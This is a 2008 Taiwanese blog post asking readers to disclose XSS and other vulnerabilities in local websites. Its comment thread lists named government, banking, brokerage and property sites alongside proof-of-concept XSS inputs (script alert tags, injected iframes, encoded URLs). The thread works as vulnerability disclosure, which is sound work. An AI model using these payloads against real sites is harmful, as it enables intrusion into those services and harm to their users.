XSS/安全漏洞爆料區

2008 年 05 月 09 日 – 22:43:02

鑒於台灣網站存在非常多的安全漏洞,如果這些安全漏洞被攻擊者所利用,將導致你我財務或其他方面的損失。如果您發現台灣網站存在XSS或其他安全漏洞,請通知我們,謝謝。

XSS/安全漏洞張貼規則:

  • 網站名稱及網址
  • 如果是XSS安全漏洞,請提供測試語法(請勿含有惡意連結),如<script>alert("XSS")</script>等
  • 如果是一般安全漏洞,請提供安全公告連結,如MS08-025(如果您發現零時差安全漏洞,請提供驗證程式碼)等

  1. “XSS/安全漏洞爆料區” 目前有 15 迴響

  2. 1.我來插頭香…..^^
    2.我建議roger大大在這個專欄中,能否清楚的說明可否將該網站的漏洞(bug)使用的語法貼出!因為這將有二種極端的狀況,所以要由您決定之…
    一.會有心地不良的人直接在這裡去對該網站做更多不利的行為
    二.可讓該網站的人清楚知道網站加強點,也讓其它的瀏覽者試行語法上的可怕(之所以可怕是在於找到漏洞之後的行為)之處
    3.有發現xss:台灣省北區國稅局hxxp://www.ntx.gov.tw/
    語法:不清楚(因為roger沒說可以貼)………..不過很簡單的語法,自己試一下就知道了….

    By 天罣 on 2008 年 05 月 9 日 - 23:33:05

  3. 台灣省北區國稅局:hxxp://www.ntx.gov.tw/
    test:<IFRAME SRC=http://www.google.com>

    By 天罣 on 2008 年 05 月 10 日 - 00:06:07

  4. XSS:易遊網:hxxp://www.eztravel.com.tw/index.html
    date:10-05-2008
    test:http://www.eztravel.com.tw/ezec/search/search.jsp?keyword=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%2FIFRAME%3E&type=6

    By 天罣 on 2008 年 05 月 10 日 - 12:22:32

  5. XSS:東森房屋聯賣網hxxp://home.etwarm.com.tw/index-search.php
    date:10-05-2008
    post:</script><script>alert("XSS")</script>

    By 天罣 on 2008 年 05 月 10 日 - 13:20:32

  6. DATE:05-10-2008
    XSS:北區房屋 hXXp://www.nhg.com.tw/smart/smart.asp
    POST:"><iframe src=http://www.google.com/

    XSS:永豐金證券hxxp://www.nsc.com.tw/ec/email/cust_service.asp
    POST:="><script>alert("XSS")</script>

    XSS:富邦金控電子報中心 hxxp://www.efubon.com.tw/fubon/008_fubon_enewsList.aspx
    post:<script&gtlalert(‘XSS’)</script>

    XSS:日盛證券/分析報告(研究報告首頁)hxxp://jsmarket.jihsun.com.tw//Research/default.asp
    ?search="><IFRAME SRC=http://www.google.com>

    XSS:統一期貨/期添大勝網hxxp://www.pfcf.com.tw/service/inpage6_2.asp
    POST:’><IFRAME SRC=http://www.google.com>

    By 天罣 on 2008 年 05 月 10 日 - 22:19:29

  7. 桃園國際機場與松山機場之搜系統採用龍捲風科技的搜尋系統現存xss bug
    url:http://www.tsa.gov.tw/cgi/searcher.exe?v=root&p=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&Submit=%B7j%B4M

    By 天罣 on 2008 年 05 月 13 日 - 22:31:30

  8. XSS:壹蘋果網絡hxxp://1-apple.com.tw/index.cfm?Fuseaction=Search
    POST:<ScRiPt>alert(‘xss’)</ScRiPt>
    SIZE=30

    XSS:玉山銀行hxxp://www.esunbank.com.tw/about/Search.aspx
    POST:———————–
    ps:有嚴謹的過濾條件

    By 天罣 on 2008 年 05 月 15 日 - 17:07:44

  9. "Hmei7 Indonesian Defacer Kissed Your Soul"?
    剛剛發現周末兩天內有不少網站被入侵,並留下上述訊息(例如:www.fsc.gov.tw).請站長幫忙看看那些網站是出了甚麼問題.

    By 路人 on 2008 年 05 月 18 日 - 22:41:14

  10. HiNet搜尋使用Live Search
    http://search.hinet.net/hisearch?k=%E2%80%9D%3E%3Ciframe%20src=http://www.google.com/&t=wps
    search=""

    不知這樣的測試方法是否正確

    By 幻相 on 2008 年 05 月 21 日 - 13:57:36

  11. 能幫忙檢查以下這個網頁是否有木馬嗎= ="
    (似乎是剛才才被駭的)
    http://tw.mabinogi.gamania.com/main1.aspx

    目前在該頁面上作最明顯的地方是左邊圖被改掉了
    (看起來像是台灣人幹的…)

    By happydog on 2008 年 05 月 23 日 - 15:53:41

  12. 台中縣政府
    防sql injection出現XSS

    http://www.taichung.gov.tw/gov/01news/news_a_view.asp?‘);alert(‘xss’);//=insert

    By Nansen on 2008 年 05 月 25 日 - 16:26:37

  13. 某些人提供的網址與測試,經檢查只是會執行有意的第3者輸入的客戶端程式碼,並不會紀錄這個惡意程式碼散佈給不知情的人。

    XSS的漏洞可怕是於駭客可以植入惡意程式碼並散佈給他人。
    上面貼的網站中某些只是會執行你輸入的程式碼,但不會散佈,實質上是無害的或低風險。

    所以請加註是否可植入程式碼此說明。

    By KP on 2008 年 06 月 11 日 - 12:40:08

  14. XSS漏洞的可怕並不僅只是植入惡意程式碼併作散佈,
    理論上,瀏覽器鎖能執行的語法都能加以利用,
    建議還是不要掉以輕心!

    Ex:某大站被搞掉就是被透過XSS幹走cookie…XD

    By Roamer on 2008 年 06 月 13 日 - 10:31:20

  15. 近來測試TIS 2009
    回報缺陷
    但我英文不好
    用奇摩翻譯(段落翻譯)
    結果才點"翻譯"
    就被導向到美國的奇摩
    NoScript就告知我有XSS攻擊
    麻煩先生你過目 段落翻譯 的原始碼
    看是否真的有洞存在

    By Wayne on 2008 年 07 月 12 日 - 19:51:16

  16. 從現在開始,如果要提供資訊給我,請張貼在論壇的「XSS或安全漏洞爆料區」。

    By Roger on 2008 年 09 月 5 日 - 12:26:04

Sorry, comments for this entry are closed at this time.

大砲開講 is proudly powered by WordPress Entries (RSS) and Comments (RSS).